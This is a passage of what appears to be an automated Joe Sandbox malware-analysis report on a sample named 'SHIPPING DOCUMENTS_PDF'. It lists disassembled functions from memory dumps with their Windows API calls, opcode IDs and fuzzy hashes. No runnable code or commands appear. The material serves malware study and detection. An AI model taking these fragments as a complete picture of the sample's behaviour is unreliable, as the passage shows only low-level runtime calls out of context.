                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                    • String ID:
                                                                                    • API String ID: 776569668-0
                                                                                    • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                    • Instruction ID: 1c6bd86f07bbaf6ca1a6bc234ad92ac0c8f186dc2d95ca0260f276e2bdc3557a
                                                                                    • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                                    • Instruction Fuzzy Hash: 2DE012A160160157CB34A679A940AE313DC8F5835271449BEB41DD7186CEA4F842C124
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: CALL
                                                                                    • API String ID: 0-4196123274
                                                                                    • Opcode ID: 211aa78404d672a1659dc6faa981ea971145f26dcb98e69bebfec6064c522434
                                                                                    • Instruction ID: 16cade2d6ac3dafe901ab27ca086340fb43f73bf2d7880c291604f146d08d9dc
                                                                                    • Opcode Fuzzy Hash: 211aa78404d672a1659dc6faa981ea971145f26dcb98e69bebfec6064c522434
                                                                                    • Instruction Fuzzy Hash: 6B223770508201DFDB24EF14C494B6ABBE1FF89305F1589EDE89A9B261D731ED49CB82
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove
                                                                                    • String ID: EA06
                                                                                    • API String ID: 4104443479-3962188686
                                                                                    • Opcode ID: 0a8df9ff249547208b29722edf40649ecc95e45d2f3783795e0e593131a9affb
                                                                                    • Instruction ID: 9b6e0d4b73defcbf86d46f40a85c1940afea7c508adc8db1f3ba37820e96ad39
                                                                                    • Opcode Fuzzy Hash: 0a8df9ff249547208b29722edf40649ecc95e45d2f3783795e0e593131a9affb
                                                                                    • Instruction Fuzzy Hash: ED415D21A0415867DF229B6488927BE7FF1DB4530AF2844F5EC869B2C2D7245DCD83A1
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove
                                                                                    • String ID:
                                                                                    • API String ID: 4104443479-0
                                                                                    • Opcode ID: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                                                    • Instruction ID: e59bef70742a6bafc45cda579e98465c2d2f3d8c6de304258f13df6451e094ba
                                                                                    • Opcode Fuzzy Hash: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                                                    • Instruction Fuzzy Hash: 3431C4B1704606AFC704DF68D8D1E69B3E9FF4831071486AAF929CB291EF30E914CB90
                                                                                    APIs
                                                                                    • IsThemeActive.UXTHEME ref: 00B54834
                                                                                      • Part of subcall function 00B7336C: __lock.LIBCMT ref: 00B73372
                                                                                      • Part of subcall function 00B7336C: DecodePointer.KERNEL32(00000001,?,00B54849,00BA7C74), ref: 00B7337E
                                                                                      • Part of subcall function 00B7336C: EncodePointer.KERNEL32(?,?,00B54849,00BA7C74), ref: 00B73389
                                                                                      • Part of subcall function 00B548FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00B54915
                                                                                      • Part of subcall function 00B548FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00B5492A
                                                                                      • Part of subcall function 00B53B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B53B68
                                                                                      • Part of subcall function 00B53B3A: IsDebuggerPresent.KERNEL32 ref: 00B53B7A
                                                                                      • Part of subcall function 00B53B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,00C152F8,00C152E0,?,?), ref: 00B53BEB
                                                                                      • Part of subcall function 00B53B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00B53C6F
                                                                                    • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00B54874
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                                    • String ID:
                                                                                    • API String ID: 1438897964-0
                                                                                    • Opcode ID: 6c864644345f32ba2d2b8014b179c1015e06814c3e886bff41c0a613ca67d068
                                                                                    • Instruction ID: 364d39d37853042a28bf1b4114ff9d195bf8b18bf0256ee60d8827e9f75c7169
                                                                                    • Opcode Fuzzy Hash: 6c864644345f32ba2d2b8014b179c1015e06814c3e886bff41c0a613ca67d068
                                                                                    • Instruction Fuzzy Hash: D1118C72908341DFC700DF68E845B4EBBE8FB96750F10859EF455872B1DBB09A48CB92
                                                                                    APIs
                                                                                      • Part of subcall function 00B7571C: __FF_MSGBANNER.LIBCMT ref: 00B75733
                                                                                      • Part of subcall function 00B7571C: __NMSG_WRITE.LIBCMT ref: 00B7573A
                                                                                      • Part of subcall function 00B7571C: RtlAllocateHeap.NTDLL(00D40000,00000000,00000001,00000000,?,?,?,00B70DD3,?), ref: 00B7575F
                                                                                    • std::exception::exception.LIBCMT ref: 00B70DEC
                                                                                    • __CxxThrowException@8.LIBCMT ref: 00B70E01
                                                                                      • Part of subcall function 00B7859B: RaiseException.KERNEL32(?,?,?,00C09E78,00000000,?,?,?,?,00B70E06,?,00C09E78,?,00000001), ref: 00B785F0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                    • String ID:
                                                                                    • API String ID: 3902256705-0
                                                                                    • Opcode ID: 6ad7c249e016fde7f4b6fa674787d8b6a5f538fd05588ccfa2f114b50ce5355d
                                                                                    • Instruction ID: c652f340c99ee507b62df535f5670b661ceab5b8fcd1b4cef33456908a211cc2
                                                                                    • Opcode Fuzzy Hash: 6ad7c249e016fde7f4b6fa674787d8b6a5f538fd05588ccfa2f114b50ce5355d
                                                                                    • Instruction Fuzzy Hash: 15F06D3294031DA6DB20BBA5EC469DEB7ECDB05311F1084A6BD2C96281DBB09A9092D1
                                                                                    APIs
                                                                                      • Part of subcall function 00B78B28: __getptd_noexit.LIBCMT ref: 00B78B28
                                                                                    • __lock_file.LIBCMT ref: 00B753EB
                                                                                      • Part of subcall function 00B76C11: __lock.LIBCMT ref: 00B76C34
                                                                                    • __fclose_nolock.LIBCMT ref: 00B753F6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                    • String ID:
                                                                                    • API String ID: 2800547568-0
                                                                                    • Opcode ID: 8ede77047b2177a498b39854dd9ffb89fde64400e90cbb5c475e8477cfb4713d
                                                                                    • Instruction ID: e7e5c5be7c7bfb4f000a7fa486ef9fa16347b7d7eb00af9f7a86785691a55842
                                                                                    • Opcode Fuzzy Hash: 8ede77047b2177a498b39854dd9ffb89fde64400e90cbb5c475e8477cfb4713d
                                                                                    • Instruction Fuzzy Hash: 8CF0BB71800B049AD7316F7598067AD77E06F41374F21C2D8A43DAB1D1CFFC4941AB55
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f2528cfbf440d6e279453c92c95672f5e09585134ef4fb3a47a49da80aa84dd8
                                                                                    • Instruction ID: 5248e81319c10f9ba704a33a6671947bea18d5a14432c4e4ff6e0f8bae34b496
                                                                                    • Opcode Fuzzy Hash: f2528cfbf440d6e279453c92c95672f5e09585134ef4fb3a47a49da80aa84dd8
                                                                                    • Instruction Fuzzy Hash: FD6157B060420ADFDB10EF64C881BBAB7E5EB08305F1484F9ED1A9B291D775ED49CB54
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: CallProcWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2714655100-0
                                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                    • Instruction ID: 3d547ab254de8bef72e4f021a845cddc3bf60f57939ad4ce22e3e86d10b56eff
                                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                    • Instruction Fuzzy Hash: E731A170A10105DBC71AEF68C4C4A69FBE6FB59300B64C6E6E81ACB355D631EDD1DB80
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClearVariant
                                                                                    • String ID:
                                                                                    • API String ID: 1473721057-0
                                                                                    • Opcode ID: 47d2ebf7719613587cd300b578c8b8fdfb1cdfa4bb2d698f4d67e3fe811efe9d
                                                                                    • Instruction ID: 4eec1f263c4924e4ac5ac5036ef6462709257bc1df3f0b063da847b61d314a78
                                                                                    • Opcode Fuzzy Hash: 47d2ebf7719613587cd300b578c8b8fdfb1cdfa4bb2d698f4d67e3fe811efe9d
                                                                                    • Instruction Fuzzy Hash: 19410574504341DFDB14DF14C494B1ABBE0BF49315F0989ECE99A9B362D732E849CB52
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: _memmove
                                                                                    • String ID:
                                                                                    • API String ID: 4104443479-0
                                                                                    • Opcode ID: e77cfd7ea101d968f015561bb629678c1e2d437abc8a6018b5055a33b314087b
                                                                                    • Instruction ID: c2c122d59375a4e0c0e11c03a3f0601f70cad71b8d54ba04f0df6a0160629eaf
                                                                                    • Opcode Fuzzy Hash: e77cfd7ea101d968f015561bb629678c1e2d437abc8a6018b5055a33b314087b
                                                                                    • Instruction Fuzzy Hash: A7212472A04A09EBDB10AF21F8817AE7BF4FB14351F2184EAE866C51A0EB30D5D0CB05
                                                                                    APIs
                                                                                      • Part of subcall function 00B54BB5: FreeLibrary.KERNEL32(00000000,?), ref: 00B54BEF
                                                                                      • Part of subcall function 00B7525B: __wfsopen.LIBCMT ref: 00B75266
                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,00C152F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00B54E0F
                                                                                      • Part of subcall function 00B54B6A: FreeLibrary.KERNEL32(00000000), ref: 00B54BA4
                                                                                      • Part of subcall function 00B54C70: _memmove.LIBCMT ref: 00B54CBA
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$Free$Load__wfsopen_memmove
                                                                                    • String ID:
                                                                                    • API String ID: 1396898556-0
                                                                                    • Opcode ID: a22b6f02fef4ab54fa0ff742f7f499e06b9b8deb63c40c8d2de29a9e035f3c71
                                                                                    • Instruction ID: be2fc6f961dfac910d1e2ab155440e5609404aa3a7643050823dc805b5d3e818
                                                                                    • Opcode Fuzzy Hash: a22b6f02fef4ab54fa0ff742f7f499e06b9b8deb63c40c8d2de29a9e035f3c71
                                                                                    • Instruction Fuzzy Hash: 9E11E731600205ABCF15BF74C817FAD77E4EF44715F1088EEF942A7181EBB19A499B50
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClearVariant
                                                                                    • String ID:
                                                                                    • API String ID: 1473721057-0
                                                                                    • Opcode ID: 6f06c3291974f1874c0f3693b87d0eaf4c2903537967e351e930a762e0639332
                                                                                    • Instruction ID: adac41a0122567ade572ba5242b1470e4ca32e52f736700f1d268a54fb8b6e2c
                                                                                    • Opcode Fuzzy Hash: 6f06c3291974f1874c0f3693b87d0eaf4c2903537967e351e930a762e0639332
                                                                                    • Instruction Fuzzy Hash: 5B211374908301DFCB14EF24C484B2ABBE1BF88315F0589A8F89A57762D731E849CB92
                                                                                    APIs
                                                                                    • __lock_file.LIBCMT ref: 00B748A6
                                                                                      • Part of subcall function 00B78B28: __getptd_noexit.LIBCMT ref: 00B78B28
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: __getptd_noexit__lock_file
                                                                                    • String ID:
                                                                                    • API String ID: 2597487223-0
                                                                                    • Opcode ID: 1a2503c4d61c90b35927e20cd04c50c426f99d08ac39f0823fa956d07bb4c282
                                                                                    • Instruction ID: aa9e47a3c10ee9129a97ac8c4e9e3a85df6bf1a19752aac167786ef099165dc7
                                                                                    • Opcode Fuzzy Hash: 1a2503c4d61c90b35927e20cd04c50c426f99d08ac39f0823fa956d07bb4c282
                                                                                    • Instruction Fuzzy Hash: 64F0AF31940609ABDF11AFB48C0A7AE36E0EF00326F15C594F43C9A191CB788A51DB52
                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(?,?,00C152F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00B54E7E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: FreeLibrary
                                                                                    • String ID:
                                                                                    • API String ID: 3664257935-0
                                                                                    • Opcode ID: 571201b6bc3126d3ed77c53b9cf34cdee0ac5d223958c8c58a4bf5dc5a44ce3a
                                                                                    • Instruction ID: 3fbf90e2b877e2e508be1796540aabefa7d4b1a77836fc574fd3bb64e55a4e85
                                                                                    • Opcode Fuzzy Hash: 571201b6bc3126d3ed77c53b9cf34cdee0ac5d223958c8c58a4bf5dc5a44ce3a
                                                                                    • Instruction Fuzzy Hash: E5F03071505751CFCB389F64E495916B7E1FF1432A32089FEE5D782620C7719888DF40
                                                                                    APIs
                                                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B707B0
                                                                                      • Part of subcall function 00B57BCC: _memmove.LIBCMT ref: 00B57C06
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                     • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: LongNamePath_memmove
                                                                                    • String ID:
                                                                                    • API String ID: 2514874351-0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: __wfsopen
                                                                                    • String ID:
                                                                                    • API String ID: 197181222-0
                                                                                    APIs
                                                                                    • GetTempPathW.KERNEL32(00000104,?), ref: 00B91DF0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033836566.0000000000B51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B50000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2033820663.0000000000B50000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000BDF000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2033924295.0000000000C04000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034049339.0000000000C0E000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.2034071800.0000000000C17000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_b50000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID: PathTemp
                                                                                    • String ID:
                                                                                    • API String ID: 2920410445-0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2033611527.00000000009B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_9b0000_SHIPPING DOCUMENTS_PDF.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    APIs
                                                                                      • Part of subcall function 00B52612: GetWindowLongW.USER32(?,000000EB), ref: 00B52623
                                                                                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 00BDCB37
                                                                                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 00BDCB95
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00BDCBD6
                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00BDCC00
                                                                                    • SendMessageW.USER32 ref: 00BDCC29
                                                                                    • _wcsncpy.LIBCMT ref: 00BDCC95
                                                                                    • GetKeyState.USER32(00000011), ref: 00BDCCB6
